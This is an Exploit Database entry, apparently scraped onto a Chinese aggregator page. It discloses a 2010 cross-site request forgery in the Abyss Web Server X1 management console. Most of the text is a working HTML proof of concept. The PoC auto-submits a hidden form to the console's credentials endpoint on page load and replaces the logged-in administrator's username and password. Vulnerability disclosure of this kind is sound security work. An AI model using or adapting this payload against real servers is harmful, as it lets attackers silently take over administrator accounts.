Abyss Web Server X1 – Cross-Site Request Forgery

• Exploit Database
• 34 阅读

• 作者： John Leitch
  日期： 2010-05-17
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/12640/

• http://osvdb.org/show/osvdb/64693
  
  <http://osvdb.org/show/osvdb/64693>
  http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html
   :
  
  Abyss Web Server X1
  XSRF<http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html>
  A cross-site request forgery vunlerability in the Abyss Web Server
  X1<http://www.aprelium.com/abyssws/download.php> management
  console can be exploited to change both the username and password of the
  logged in user.
  PoC:
   view plain<http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html#>
  print<http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html#>
  ?<http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html#>
  
   1. <html>
   2. <body onload="document.forms[0].submit()">
   3. <form method="post" action="
   http://localhost:9999/console/credentials">
   4. <input type="hidden" name="/console/credentials/login"
   5.value="new_username" />
   6. <input type="hidden" name=
   "/console/credentials/password/$pass1"
   7.value="new_password" />
   8. <input type="hidden" name=
   "/console/credentials/password/$pass2"
   9.value="new_password" />
   10. <input type="hidden" name="/console/credentials/bok"
   11.value="%C2%A0%C2%A0OK%C2%A0%C2%A0" />
   12. </form>
   13. </body>
   14. </html>
  
  <http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html>